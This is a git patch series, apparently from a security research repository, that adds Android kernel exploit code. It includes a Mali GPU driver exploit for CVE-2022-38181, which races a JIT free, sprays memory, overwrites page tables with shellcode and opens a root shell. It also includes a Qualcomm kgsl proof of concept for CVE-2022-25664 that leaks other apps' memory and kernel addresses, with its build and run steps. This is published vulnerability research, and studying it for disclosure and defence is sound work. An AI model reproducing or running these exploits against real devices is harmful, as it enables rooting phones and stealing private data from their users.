+ uint64_t jit_pages = SPRAY_PAGES;
+ uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr);
+ atom_number++;
+ mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0);
+ for (int i = 0; i < NUM_TRIALS; i++) {
+ union kbase_ioctl_mem_query query = {0};
+ query.in.gpu_addr = jit_addr;
+ query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+ flush_regions[i] = flush(SPRAY_CPU, i + *flush_idx);
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) {
+ migrate_to_cpu(SPRAY_CPU);
+ spray(mali_fd);
+ for (int j = 0; j < SPRAY_NUM; j++) {
+ mem_commit(mali_fd, gpu_va[j], SPRAY_PAGES);
+ }
+ LOG("region freed %d\n", i);
+
+ uint64_t alias_region = alias_sprayed_regions(mali_fd);
+ fault_pages();
+ LOG("cleanup flush region\n");
+ for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE);
+
+ uint64_t drain = drain_mem_pool(mali_fd);
+ release_mem_pool(mali_fd, drain);
+
+ jit_free(mali_fd, atom_number, jit_id);
+
+ map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ LOG("jit_freed\n");
+ int freed_idx = find_freed_idx(mali_fd);
+ if (freed_idx == -1) err(1, "Failed to find freed_idx");
+ LOG("Found freed_idx %d\n", freed_idx);
+ int pgd_idx = find_pgd(freed_idx, 0);
+ if (pgd_idx == -1) err(1, "Failed to find pgd");
+ uint64_t pgd = alias_region + pgd_idx * 0x1000 + freed_idx * (SPRAY_PAGES * 0x1000);
+ LOG("Found pgd %d, %lx\n", pgd_idx, pgd);
+ atom_number++;
+ write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+ run_enforce();
+ cleanup(mali_fd, pgd);
+ return 0;
+ }
+ }
+ LOG("failed, retry.\n");
+ jit_id++;
+ *flush_idx += NUM_TRIALS;
+ return -1;
+}
+
+#ifdef SHELL
+
+// Standalone (adb shell) entry point: set up two Mali contexts -- fd 1
+// (group 0) for the JIT/spray race, fd 2 (group 1) for the reserved regions
+// reused as page tables -- then retry trigger() up to 10 times and drop
+// into a (now-root) shell on success.
+int main() {
+ setbuf(stdout, NULL);
+ setbuf(stderr, NULL);
+
+ select_offset();
+ int mali_fd = open_dev(MALI);
+
+ setup_mali(mali_fd, 0);
+
+ void* tracking_page = setup_tracking_page(mali_fd);
+ jit_init(mali_fd, 0x1000, 100, 0);
+
+ int mali_fd2 = open_dev(MALI);
+ setup_mali(mali_fd2, 1);
+ setup_tracking_page(mali_fd2);
+ reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ int flush_idx = 0;
+ for (int i = 0; i < 10; i++) {
+ if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
+ system("sh");
+ break;
+ }
+ }
+}
+#else
+#include <jni.h>
+// JNI entry point (app build): same setup/retry loop as main(), but instead
+// of spawning a shell it logs the (hopefully root) uid/euid and returns 0
+// on success, -1 after 10 failed attempts.
+JNIEXPORT int JNICALL
+Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz)
+{
+ setbuf(stdout, NULL);
+ setbuf(stderr, NULL);
+
+ select_offset();
+ int mali_fd = open_dev(MALI);
+
+ setup_mali(mali_fd, 0);
+
+ void* tracking_page = setup_tracking_page(mali_fd);
+ jit_init(mali_fd, 0x1000, 100, 0);
+
+ int mali_fd2 = open_dev(MALI);
+ setup_mali(mali_fd2, 1);
+ setup_tracking_page(mali_fd2);
+ reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+ int flush_idx = 0;
+ for (int i = 0; i < 10; i++) {
+ if(!trigger(mali_fd, mali_fd2, &flush_idx)) {
+ LOG("uid: %d euid %d", getuid(), geteuid());
+ return 0;
+ }
+ }
+ return -1;
+}
+#endif
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h b/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h
new file mode 100644
index 0000000..e0ce432
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/midgard.h
@@ -0,0 +1,260 @@
+#ifndef MIDGARD_H
+#define MIDGARD_H
+
+//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
+
+/* NOTE(review): header names were stripped from this copy of the patch;
+ * reconstructed from the symbols used below (FILE/fprintf, uint64_t, bool,
+ * PRIx64, assert) -- TODO confirm against upstream. */
+#include <stdio.h>
+#include <stdint.h>
+#include <stdbool.h>
+#include <inttypes.h>
+#include <assert.h>
+#include <string.h>
+#include <stddef.h>
+
+#define pan_section_ptr(base, A, S) \
+ ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET))
+
+#define pan_section_pack(dst, A, S, name) \
+ for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \
+ *_loop_terminate = (void *) (dst); \
+ __builtin_expect(_loop_terminate != NULL, 1); \
+ ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \
+ _loop_terminate = NULL; }))
+
+
+// Place value v into bit field [start, end] of a descriptor word (shift
+// only; masking is the caller's job). In debug builds, assert that v fits
+// in the field's width.
+static inline uint64_t
+__gen_uint(uint64_t v, uint32_t start, uint32_t end)
+{
+#ifndef NDEBUG
+ const int width = end - start + 1;
+ if (width < 64) {
+ const uint64_t max = (1ull << width) - 1;
+ assert(v <= max);
+ }
+#endif
+
+ return v << start;
+}
+
+// Extract bit field [start, end] from a byte-addressed descriptor buffer:
+// gather the covered bytes little-endian, then shift and mask down to the
+// field width.
+static inline uint64_t
+__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end)
+{
+ uint64_t val = 0;
+ const int width = end - start + 1;
+ const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 );
+
+ for (int byte = start / 8; byte <= end / 8; byte++) {
+ val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8);
+ }
+
+ return (val >> (start % 8)) & mask;
+}
+
+enum mali_job_type {
+ MALI_JOB_TYPE_NOT_STARTED = 0,
+ MALI_JOB_TYPE_NULL = 1,
+ MALI_JOB_TYPE_WRITE_VALUE = 2,
+ MALI_JOB_TYPE_CACHE_FLUSH = 3,
+ MALI_JOB_TYPE_COMPUTE = 4,
+ MALI_JOB_TYPE_VERTEX = 5,
+ MALI_JOB_TYPE_GEOMETRY = 6,
+ MALI_JOB_TYPE_TILER = 7,
+ MALI_JOB_TYPE_FUSED = 8,
+ MALI_JOB_TYPE_FRAGMENT = 9,
+};
+
+enum mali_write_value_type {
+ MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1,
+ MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2,
+ MALI_WRITE_VALUE_TYPE_ZERO = 3,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7,
+};
+
+
+struct MALI_WRITE_VALUE_JOB_PAYLOAD {
+ uint64_t address;
+ enum mali_write_value_type type;
+ uint64_t immediate_value;
+};
+
+struct MALI_JOB_HEADER {
+ uint32_t exception_status;
+ uint32_t first_incomplete_task;
+ uint64_t fault_pointer;
+ bool is_64b;
+ enum mali_job_type type;
+ bool barrier;
+ bool invalidate_cache;
+ bool suppress_prefetch;
+ bool enable_texture_mapper;
+ bool relax_dependency_1;
+ bool relax_dependency_2;
+ uint32_t index;
+ uint32_t dependency_1;
+ uint32_t dependency_2;
+ uint64_t next;
+};
+
+
+static inline void
+MALI_JOB_HEADER_pack(uint32_t * restrict cl,
+ const struct MALI_JOB_HEADER * restrict values)
+{
+ cl[ 0] = __gen_uint(values->exception_status, 0, 31);
+ cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31);
+ cl[ 2] = __gen_uint(values->fault_pointer, 0, 63);
+ cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32;
+ cl[ 4] = __gen_uint(values->is_64b, 0, 0) |
+ __gen_uint(values->type, 1, 7) |
+ __gen_uint(values->barrier, 8, 8) |
+ __gen_uint(values->invalidate_cache, 9, 9) |
+ __gen_uint(values->suppress_prefetch, 11, 11) |
+ __gen_uint(values->enable_texture_mapper, 12, 12) |
+ __gen_uint(values->relax_dependency_1, 14, 14) |
+ __gen_uint(values->relax_dependency_2, 15, 15) |
+ __gen_uint(values->index, 16, 31);
+ cl[ 5] = __gen_uint(values->dependency_1, 0, 15) |
+ __gen_uint(values->dependency_2, 16, 31);
+ cl[ 6] = __gen_uint(values->next, 0, 63);
+ cl[ 7] = __gen_uint(values->next, 0, 63) >> 32;
+}
+
+
+#define MALI_JOB_HEADER_LENGTH 32
+struct mali_job_header_packed { uint32_t opaque[8]; };
+static inline void
+MALI_JOB_HEADER_unpack(const uint8_t * restrict cl,
+ struct MALI_JOB_HEADER * restrict values)
+{
+ if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n");
+ values->exception_status = __gen_unpack_uint(cl, 0, 31);
+ values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63);
+ values->fault_pointer = __gen_unpack_uint(cl, 64, 127);
+ values->is_64b = __gen_unpack_uint(cl, 128, 128);
+ values->type = __gen_unpack_uint(cl, 129, 135);
+ values->barrier = __gen_unpack_uint(cl, 136, 136);
+ values->invalidate_cache = __gen_unpack_uint(cl, 137, 137);
+ values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139);
+ values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140);
+ values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142);
+ values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143);
+ values->index = __gen_unpack_uint(cl, 144, 159);
+ values->dependency_1 = __gen_unpack_uint(cl, 160, 175);
+ values->dependency_2 = __gen_unpack_uint(cl, 176, 191);
+ values->next = __gen_unpack_uint(cl, 192, 255);
+}
+
+static inline const char *
+mali_job_type_as_str(enum mali_job_type imm)
+{
+ switch (imm) {
+ case MALI_JOB_TYPE_NOT_STARTED: return "Not started";
+ case MALI_JOB_TYPE_NULL: return "Null";
+ case MALI_JOB_TYPE_WRITE_VALUE: return "Write value";
+ case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush";
+ case MALI_JOB_TYPE_COMPUTE: return "Compute";
+ case MALI_JOB_TYPE_VERTEX: return "Vertex";
+ case MALI_JOB_TYPE_GEOMETRY: return "Geometry";
+ case MALI_JOB_TYPE_TILER: return "Tiler";
+ case MALI_JOB_TYPE_FUSED: return "Fused";
+ case MALI_JOB_TYPE_FRAGMENT: return "Fragment";
+ default: return "XXX: INVALID";
+ }
+}
+
+static inline void
+MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent)
+{
+ fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status);
+ fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task);
+ fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer);
+ fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false");
+ fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type));
+ fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false");
+ fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false");
+ fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false");
+ fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false");
+ fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false");
+ fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false");
+ fprintf(fp, "%*sIndex: %u\n", indent, "", values->index);
+ fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1);
+ fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2);
+ fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next);
+}
+
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl,
+ const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
+{
+ cl[ 0] = __gen_uint(values->address, 0, 63);
+ cl[ 1] = __gen_uint(values->address, 0, 63) >> 32;
+ cl[ 2] = __gen_uint(values->type, 0, 31);
+ cl[ 3] = 0;
+ cl[ 4] = __gen_uint(values->immediate_value, 0, 63);
+ cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32;
+}
+
+
+#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24
+#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0
+
+
+struct mali_write_value_job_payload_packed { uint32_t opaque[6]; };
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl,
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
+{
+ if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n");
+ values->address = __gen_unpack_uint(cl, 0, 63);
+ values->type = __gen_unpack_uint(cl, 64, 95);
+ values->immediate_value = __gen_unpack_uint(cl, 128, 191);
+}
+
+static inline const char *
+mali_write_value_type_as_str(enum mali_write_value_type imm)
+{
+ switch (imm) {
+ case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter";
+ case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp";
+ case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32";
+ case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64";
+ default: return "XXX: INVALID";
+ }
+}
+
+static inline void
+MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent)
+{
+ fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address);
+ fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type));
+ fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value);
+}
+
+struct mali_write_value_job_packed {
+ uint32_t opaque[14];
+};
+
+#define MALI_JOB_HEADER_header \
+ .is_64b = true
+
+#define MALI_WRITE_VALUE_JOB_LENGTH 56
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print
+#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print
+#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32
+
+#endif
From b209d0e45893d330f1e7c512b08250b16d20a990 Mon Sep 17 00:00:00 2001
From: Man Yue Mo
Date: Mon, 23 Jan 2023 15:23:20 +0000
Subject: [PATCH 05/53] Correct CVE number.
---
SecurityExploits/Android/Mali/CVE_2022_38181/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/README.md b/SecurityExploits/Android/Mali/CVE_2022_38181/README.md
index 71df73d..b89efc7 100644
--- a/SecurityExploits/Android/Mali/CVE_2022_38181/README.md
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/README.md
@@ -1,4 +1,4 @@
-## Exploit for CVE-2022-20186
+## Exploit for CVE-2022-38181
The write up can be found [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug). This is a bug in the Arm Mali kernel driver that I reported in July 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
From 1be133fe561e453987d8a6e7439bd576a6a6a274 Mon Sep 17 00:00:00 2001
From: JarLob
Date: Thu, 16 Feb 2023 13:17:08 +0100
Subject: [PATCH 06/53] Add Ruby to the list
---
.github/ISSUE_TEMPLATE/all-for-one.yml | 1 +
1 file changed, 1 insertion(+)
diff --git a/.github/ISSUE_TEMPLATE/all-for-one.yml b/.github/ISSUE_TEMPLATE/all-for-one.yml
index 80c62dc..45c44ee 100644
--- a/.github/ISSUE_TEMPLATE/all-for-one.yml
+++ b/.github/ISSUE_TEMPLATE/all-for-one.yml
@@ -34,6 +34,7 @@ body:
- Javascript
- GoLang
- Python
+ - Ruby
- C/C++
- C#
validations:
From 3cd53e14a97bcd7854fb64f6bd03c1ce93bf216a Mon Sep 17 00:00:00 2001
From: Man Yue Mo
Date: Tue, 21 Feb 2023 11:29:33 +0000
Subject: [PATCH 07/53] Initial commit.
---
.../Android/Qualcomm/CVE_2022_25664/README.md | 48 ++++
.../CVE_2022_25664/adreno_kernel/adreno_cmd.c | 76 ++++++
.../CVE_2022_25664/adreno_kernel/adreno_cmd.h | 40 +++
.../adreno_kernel/adreno_kernel.c | 225 +++++++++++++++++
.../CVE_2022_25664/adreno_kernel/dma_search.h | 94 +++++++
.../CVE_2022_25664/adreno_kernel/kgsl_utils.c | 80 ++++++
.../CVE_2022_25664/adreno_kernel/kgsl_utils.h | 237 ++++++++++++++++++
.../CVE_2022_25664/adreno_user/adreno.h | 218 ++++++++++++++++
.../CVE_2022_25664/adreno_user/adreno_user.c | 221 ++++++++++++++++
9 files changed, 1239 insertions(+)
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h
create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md
new file mode 100644
index 0000000..cfb7192
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md
@@ -0,0 +1,48 @@
+## CVE-2022-25664
+
+The write up can be found [here](https://github.blog/2023-02-23-the-code-that-wasnt-there-reading-memory-on-an-android-device-by-accident). This is a bug in the Qualcomm kgsl driver that I reported in December 2021. The bug can be used to leak information in other user apps, as well as in the kernel from an untrusted app.
+
+The directory `adreno_user` contains a proof-of-concept for leaking memory from other applications. It'll repeatedly trigger the bug and read the stale information contained in memory pages. There is no way to tell or control what information is being leaked. To test this, compile with the following command:
+
+```
+aarch64-linux-android30-clang -O2 adreno_user.c -o adreno_user
+```
+
+and then push `adreno_user` to the device and run it. It should print out non-zero memory content:
+
+```
+flame:/ $ /data/local/tmp/adreno_user
+hexdump(0x50000000, 0x190)
+00000000 0d 00 00 00 00 00 00 00 22 55 00 00 00 00 00 00 |........"U......|
+00000010 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...|
+00000020 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................|
+00000030 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000040 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
+00000050 cb e9 67 e5 73 00 00 b4 00 00 00 00 00 00 00 00 |..g.s...........|
+00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000070 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000080 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
+000000a0 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...|
+.......
+```
+
+The directory `adreno_kernel` contains a proof-of-concept for leaking kernel information for KASLR bypass. It'll repeatedly trigger the bug and try to leak kernel addresses. Depending on whether the device is running kernel branch 4.x or 5.x, the macro `KERNEL_BRANCH` in `adreno_kernel.c` should be set to either `4` or `5`.
+
+To test, compile with
+
+```
+aarch64-linux-android30-clang adreno_kernel.c adreno_cmd.c kgsl_utils.c -O3 -o adreno_kernel
+```
+
+and then run it on the device. If successful, it should print out the kernel addresses of some objects and functions:
+
+```
+flame:/ $ /data/local/tmp/adreno_kernel
+found dma fence object:
+kgsl_syncsource_fence_ops address: ffffff9daaea8b48
+object address: fffffffe116100a0
+syncsource address: fffffffe0b244480
+```
+
+It has been tested on a number of devices. The time it takes (depends on the success rate of a single leak) varies across devices. It is relatively quick on the Pixel 4, but takes longer on the Samsung Z Flip 3.
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c
new file mode 100644
index 0000000..9a9b279
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c
@@ -0,0 +1,76 @@
+#include "adreno_cmd.h"
+
+uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr)
+{
+ uint *start = cmds;
+
+ *cmds++ = lower_32_bits(gpuaddr);
+ *cmds++ = upper_32_bits(gpuaddr);
+
+ return cmds - start;
+}
+
+uint pm4_calc_odd_parity_bit(uint val) {
+ return (0x9669 >> (0xf & ((val) ^
+ ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^
+ ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^
+ ((val) >> 28)))) & 1;
+}
+
+uint cp_type7_packet(uint opcode, uint cnt) {
+ return CP_TYPE7_PKT | ((cnt) << 0) |
+ (pm4_calc_odd_parity_bit(cnt) << 15) |
+ (((opcode) & 0x7F) << 16) |
+ ((pm4_calc_odd_parity_bit(opcode) << 23));
+}
+
+uint cp_wait_for_me(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0);
+
+ return cmds - start;
+}
+
+uint cp_mem_packet(int opcode, uint size, uint num_mem) {
+ return cp_type7_packet(opcode, size + num_mem);
+}
+
+uint cp_wait_for_idle(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0);
+
+ return cmds - start;
+}
+
+uint cp_type4_packet(uint opcode, uint cnt)
+{
+ return CP_TYPE4_PKT | ((cnt) << 0) |
+ (pm4_calc_odd_parity_bit(cnt) << 7) |
+ (((opcode) & 0x3FFFF) << 8) |
+ ((pm4_calc_odd_parity_bit(opcode) << 27));
+}
+
+uint cp_register(
+ unsigned int reg, unsigned int size)
+{
+ return cp_type4_packet(reg, size);
+}
+
+uint cp_invalidate_state(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3);
+ *cmds++ = 0x40000;
+ *cmds++ = 0;
+ *cmds++ = 0;
+
+ return cmds - start;
+}
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h
new file mode 100644
index 0000000..01cfeb5
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h
@@ -0,0 +1,40 @@
+#ifndef ADRENO_CMD_H
+#define ADRENO_CMD_H
+
+#include
+
+#define CP_TYPE4_PKT (4 << 28)
+#define CP_TYPE7_PKT (7 << 28)
+
+#define CP_NOP 0x10
+#define CP_WAIT_FOR_ME 0x13
+#define CP_WAIT_FOR_IDLE 0x26
+#define CP_WAIT_REG_MEM 0x3c
+#define CP_MEM_WRITE 0x3d
+#define CP_INDIRECT_BUFFER_PFE 0x3f
+#define CP_SET_DRAW_STATE 0x43
+#define CP_MEM_TO_MEM 0x73
+#define CP_SET_PROTECTED_MODE 0x5f
+
+#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16))
+#define lower_32_bits(n) ((uint32_t)(n))
+
+uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr);
+
+uint pm4_calc_odd_parity_bit(uint val);
+
+uint cp_type7_packet(uint opcode, uint cnt);
+
+uint cp_wait_for_me(uint *cmds);
+
+uint cp_mem_packet(int opcode, uint size, uint num_mem);
+
+uint cp_wait_for_idle(uint *cmds);
+
+uint cp_type4_packet(uint opcode, uint cnt);
+
+uint cp_register(unsigned int reg, unsigned int size);
+
+uint cp_invalidate_state(uint *cmds);
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c
new file mode 100644
index 0000000..474f706
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c
@@ -0,0 +1,225 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+#include "kgsl_utils.h"
+#include "adreno_cmd.h"
+#include "dma_search.h"
+
+#define CMD_SIZE 4
+
+#define OBJS_PER_SLAB (0x1000/OBJECT_SIZE)
+
+#define CPU_PARTIAL 30
+
+#define MMAP_SPRAY 1000
+
+#define OBJ_SPRAY 10000
+
+#define CPU_SETSIZE 1024
+#define __NCPUBITS (8 * sizeof (unsigned long))
+typedef struct
+{
+ unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
+} cpu_set_t;
+
+#define CPU_SET(cpu, cpusetp) \
+ ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
+#define CPU_ZERO(cpusetp) \
+ memset((cpusetp), 0, sizeof(cpu_set_t))
+
+#define KERNEL_BRANCH KERNEL_4
+
+void migrate_to_cpu(int i)
+{
+ int syscallres;
+ pid_t pid = gettid();
+ cpu_set_t cpu;
+ CPU_ZERO(&cpu);
+ CPU_SET(i, &cpu);
+
+ syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
+ if (syscallres)
+ {
+ err(1, "Error in the syscall setaffinity");
+ }
+}
+
+static uint32_t* map_anon(int kgsl_fd, uint64_t* addr, size_t size) {
+ uint32_t* out = NULL;
+ out = (uint32_t*)mmap(NULL, size, PROT_READ|PROT_WRITE,
+ MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ if (out == MAP_FAILED) {
+ err(1, "shared_mem_buf failed");
+ }
+ int ret = kgsl_map(kgsl_fd, (unsigned long)out, size, addr, 0);
+
+ if (ret == -1) {
+ err(1, "kgsl_map failed %p\n", out);
+ }
+ return out;
+}
+
+static uint32_t write_gpu_cmd(uint32_t* write_cmd_buf, uint64_t shared_mem_gpuaddr, uint32_t n) {
+ uint32_t* write_cmds;
+
+ write_cmd_buf = write_cmd_buf + 0x1000/CMD_SIZE - 5;
+
+ write_cmds = write_cmd_buf;
+
+ *write_cmds++ = cp_type7_packet(CP_NOP, 1);
+ *write_cmds++ = 0xffffffff;
+
+ *write_cmds++ = cp_type7_packet(CP_MEM_WRITE, 2 + n);
+
+ write_cmds += cp_gpuaddr(write_cmds, shared_mem_gpuaddr);
+
+ return (write_cmds - write_cmd_buf + n) * CMD_SIZE;
+}
+
+
+static int io_setup(unsigned nr, aio_context_t *ctxp)
+{
